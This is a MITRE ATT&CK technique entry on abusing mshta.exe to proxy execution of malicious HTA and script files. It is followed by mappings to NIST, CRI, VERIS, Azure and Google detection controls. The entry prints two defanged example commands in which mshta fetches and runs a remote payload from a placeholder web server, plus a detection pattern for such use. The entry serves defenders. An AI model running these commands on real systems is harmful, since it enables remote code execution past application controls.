T1218.005 Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

View in MITRE ATT&CK®

CRI Profile Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
PR.PS-05.02 Mobile code prevention Mitigates T1218.005 Mshta
Comments
Mobile code procedures address specific actions taken to prevent the development, acquisition, and introduction of unacceptable mobile code within organizational systems, including requiring mobile code to be digitally signed by a trusted source.
References

    NIST 800-53 Mappings

    Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
    CM-06 Configuration Settings mitigates T1218.005 Mshta
    CM-11 User-installed Software mitigates T1218.005 Mshta
    SI-16 Memory Protection mitigates T1218.005 Mshta
    RA-05 Vulnerability Monitoring and Scanning mitigates T1218.005 Mshta
    CM-08 System Component Inventory mitigates T1218.005 Mshta
    SI-10 Information Input Validation mitigates T1218.005 Mshta
    SI-03 Malicious Code Protection mitigates T1218.005 Mshta
    SI-07 Software, Firmware, and Information Integrity mitigates T1218.005 Mshta
    CM-02 Baseline Configuration mitigates T1218.005 Mshta
    CM-07 Least Functionality mitigates T1218.005 Mshta
    SI-04 System Monitoring mitigates T1218.005 Mshta

    VERIS Mappings

    Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
    action.hacking.variety.Abuse of functionality Abuse of functionality. related-to T1218.005 Mshta

    Azure Mappings

    Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
    alerts_for_windows_machines Alerts for Windows Machines technique_scores T1218.005 Mshta
    Comments
    This control may detect suspicious usage of Mshta to execute PowerShell and suspicious Rundll32 execution. The following alerts may be generated: "Detected suspicious execution via rundll32.exe", "Detected suspicious combination of HTA and PowerShell".
    References

    GCP Mappings

    Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
    google_secops Google Security Operations technique_scores T1218.005 Mshta
    Comments
    Google Security Ops is able to trigger an alert based on using MSHTA to call a remote HTML application on Windows (e.g., "mshta.+http"). This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/mitre_attack/T1218_005_windows_mshta_remote_usage.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/ioc_sigma/windows/mshta_spwaned_by_svchost_as_seen_in_lethalhta__sysmon.yaral
    References